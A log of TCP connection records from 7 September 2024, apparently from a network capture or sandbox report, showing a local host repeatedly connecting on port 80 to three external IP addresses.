                                                                                                                                                                    Sep 7, 2024 15:36:59.814558029 CEST806000864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.814630985 CEST6000880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:59.814692974 CEST6000880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:36:59.819942951 CEST806000864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.820007086 CEST6000880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:00.004313946 CEST6000980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.009171963 CEST806000988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.009248972 CEST6000980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.024804115 CEST6000980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.029943943 CEST806000988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.029994965 CEST6000980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.194505930 CEST6001080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.200458050 CEST806001088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.200530052 CEST6001080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.205096006 CEST6001080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.211150885 CEST806001088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.211210966 CEST6001080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.887425900 CEST6001180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.892349005 CEST806001188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.892419100 CEST6001180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.899499893 CEST6001180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:00.904356003 CEST806001188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:00.904428959 CEST6001180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:01.520179033 CEST6001280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:01.525027990 CEST806001288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.525114059 CEST6001280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:01.525191069 CEST6001280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:01.532206059 CEST806001288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.532305002 CEST6001280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:01.783133984 CEST6001380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:01.788095951 CEST806001364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.788167000 CEST6001380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:01.788248062 CEST6001380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:01.793241978 CEST806001364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:01.793311119 CEST6001380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:02.801228046 CEST6001480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:02.806044102 CEST806001445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.806108952 CEST6001480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:02.806189060 CEST6001480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:02.811350107 CEST806001445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:02.811400890 CEST6001480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:04.020247936 CEST6001580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:04.025250912 CEST806001588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.025357962 CEST6001580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:04.040149927 CEST6001580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:04.045053959 CEST806001588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:04.045134068 CEST6001580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:05.283565998 CEST6001680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:05.288700104 CEST806001664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.288794994 CEST6001680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:05.288937092 CEST6001680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:05.295376062 CEST806001664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.295506954 CEST6001680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:05.341830969 CEST6001780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:05.346767902 CEST806001764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.346858025 CEST6001780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:05.352615118 CEST6001780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:05.357598066 CEST806001764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:05.357650042 CEST6001780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:06.621022940 CEST6001880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:06.626003981 CEST806001888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.626071930 CEST6001880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:06.626148939 CEST6001880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:06.631222010 CEST806001888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.631323099 CEST6001880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:06.750885963 CEST6001980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:06.758874893 CEST806001964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.758949041 CEST6001980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:06.759052038 CEST6001980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:06.764308929 CEST806001964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:06.764362097 CEST6001980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:07.159651995 CEST6002080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:07.164566040 CEST806002088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:07.164648056 CEST6002080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:07.164720058 CEST6002080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:07.169939041 CEST806002088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:07.170006037 CEST6002080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:08.176713943 CEST6002180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:08.181555986 CEST806002188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:08.181658030 CEST6002180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:08.181756973 CEST6002180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:08.187108994 CEST806002188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:08.188853979 CEST6002180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:09.831816912 CEST6082480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:09.836715937 CEST806082488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:09.836795092 CEST6082480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:09.837011099 CEST6082480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:09.842187881 CEST806082488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:09.842231989 CEST6082480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:10.463989973 CEST6082580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:10.470443010 CEST806082545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:10.470537901 CEST6082580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:10.477684021 CEST6082580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:10.483452082 CEST806082545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:10.483562946 CEST6082580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:11.089047909 CEST6082680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:11.093897104 CEST806082664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.093955040 CEST6082680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:11.102641106 CEST6082680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:11.108695030 CEST806082664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:11.108756065 CEST6082680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:13.900048018 CEST5673580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:13.905236959 CEST805673588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:13.905303001 CEST5673580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:13.905404091 CEST5673580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:13.911022902 CEST805673588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:13.911097050 CEST5673580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:14.267967939 CEST5673680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:14.272964954 CEST805673688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.273025036 CEST5673680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:14.273114920 CEST5673680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:14.278225899 CEST805673688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.278275967 CEST5673680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:14.513432026 CEST5673780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:14.518297911 CEST805673764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.518363953 CEST5673780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:14.518431902 CEST5673780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:14.523631096 CEST805673764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.523682117 CEST5673780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:14.842118025 CEST5673880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:14.847517014 CEST805673888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.847568035 CEST5673880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:14.852608919 CEST5673880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:14.857702017 CEST805673888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:14.857759953 CEST5673880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:15.151787996 CEST5673980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:15.159132004 CEST805673945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:15.159202099 CEST5673980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:15.159297943 CEST5673980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:15.164818048 CEST805673945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:15.164866924 CEST5673980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:15.427809954 CEST5674080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:15.432905912 CEST805674045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:15.433020115 CEST5674080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:15.433042049 CEST5674080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:15.439899921 CEST805674045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:15.439956903 CEST5674080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:16.564502001 CEST5674180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:16.569602966 CEST805674188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.569683075 CEST5674180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:16.569756031 CEST5674180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:16.575769901 CEST805674188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.575838089 CEST5674180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:16.616920948 CEST5674280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:16.625570059 CEST805674288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.625658035 CEST5674280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:16.633902073 CEST5674280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:16.640537977 CEST805674288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.640615940 CEST5674280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:16.957459927 CEST5674380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:16.962249041 CEST805674345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.962315083 CEST5674380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:16.962400913 CEST5674380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:16.967303991 CEST805674345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:16.967365026 CEST5674380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:17.231698990 CEST5674480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:17.236742973 CEST805674488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.236810923 CEST5674480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:17.243294001 CEST5674480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:17.248317003 CEST805674488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.248361111 CEST5674480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:17.351895094 CEST5674580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:17.357583046 CEST805674588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.357672930 CEST5674580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:17.357764959 CEST5674580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:17.363729000 CEST805674588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:17.363804102 CEST5674580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:18.434783936 CEST5674680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:18.440047979 CEST805674688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:18.440202951 CEST5674680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:18.440282106 CEST5674680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:18.445699930 CEST805674688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:18.446166992 CEST5674680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:19.838301897 CEST5674780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:19.843385935 CEST805674764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.843502045 CEST5674780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:19.843585014 CEST5674780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:19.850354910 CEST805674764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:19.850420952 CEST5674780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:21.134789944 CEST5674880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:21.142507076 CEST805674888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:21.142586946 CEST5674880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:21.142658949 CEST5674880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:21.150796890 CEST805674888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:21.150856972 CEST5674880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:21.716856956 CEST5674980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:21.722621918 CEST805674988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:21.722685099 CEST5674980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:21.727705956 CEST5674980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:21.733371019 CEST805674988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:21.733441114 CEST5674980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:22.068712950 CEST5675080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:22.073946953 CEST805675088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:22.074017048 CEST5675080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:22.074086905 CEST5675080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:22.079483032 CEST805675088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:22.079560041 CEST5675080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:22.220746040 CEST5675180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:22.225763083 CEST805675164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:22.225857019 CEST5675180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:22.227956057 CEST5675180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:22.233005047 CEST805675164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:22.233057022 CEST5675180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:22.920231104 CEST5675280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:22.925133944 CEST805675264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:22.925208092 CEST5675280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:22.925277948 CEST5675280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:22.931627035 CEST805675264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:22.931724072 CEST5675280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:23.239553928 CEST5675380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:23.245563030 CEST805675345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:23.245650053 CEST5675380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:23.245757103 CEST5675380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:23.251059055 CEST805675345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:23.251130104 CEST5675380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:23.381330967 CEST5675480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:23.387479067 CEST805675445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:23.387559891 CEST5675480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:23.399544001 CEST5675480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:23.404441118 CEST805675445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:23.404537916 CEST5675480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:23.707782030 CEST5675580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:23.712729931 CEST805675588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:23.712804079 CEST5675580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:23.727711916 CEST5675580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:23.732728958 CEST805675588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:23.732790947 CEST5675580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:23.782588005 CEST5675680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:23.788213015 CEST805675664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:23.788300991 CEST5675680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:23.788377047 CEST5675680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:23.794833899 CEST805675664.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:23.794907093 CEST5675680192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:24.540498972 CEST5675780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:24.545619011 CEST805675788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:24.545711040 CEST5675780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:24.559247971 CEST5675780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:24.564943075 CEST805675788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:24.565016031 CEST5675780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:25.716279984 CEST5675880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:25.721138954 CEST805675845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:25.721190929 CEST5675880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:25.727669954 CEST5675880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:25.737956047 CEST805675845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:25.752274990 CEST805675845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:25.752320051 CEST5675880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:27.053766966 CEST5675980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:27.058865070 CEST805675945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:27.058945894 CEST5675980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:27.059015036 CEST5675980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:27.064419985 CEST805675945.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:27.064460993 CEST5675980192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:27.434556007 CEST5676080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:27.440032959 CEST805676064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:27.440099001 CEST5676080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:27.446400881 CEST5676080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:27.453577042 CEST805676064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:27.453625917 CEST5676080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:27.540543079 CEST5676180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:27.546987057 CEST805676164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:27.547601938 CEST5676180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:27.547744989 CEST5676180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:27.554869890 CEST805676164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:27.556133986 CEST5676180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:30.691207886 CEST5676280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:30.696059942 CEST805676288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:30.696135998 CEST5676280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:30.696365118 CEST5676280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:30.701512098 CEST805676288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:30.701567888 CEST5676280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:30.784430981 CEST5676380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:30.789891005 CEST805676364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:30.789989948 CEST5676380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:30.790085077 CEST5676380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:30.795241117 CEST805676364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:30.795325041 CEST5676380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:30.840943098 CEST5676480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:30.847182989 CEST805676488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:30.847259998 CEST5676480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:30.852622032 CEST5676480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:30.857676983 CEST805676488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:30.857728958 CEST5676480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:32.024035931 CEST5676580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:32.030487061 CEST805676588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:32.030599117 CEST5676580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:32.030658007 CEST5676580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:32.036240101 CEST805676588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:32.036293030 CEST5676580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:33.007118940 CEST5676680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:33.017057896 CEST805676688.198.29.97192.168.2.12
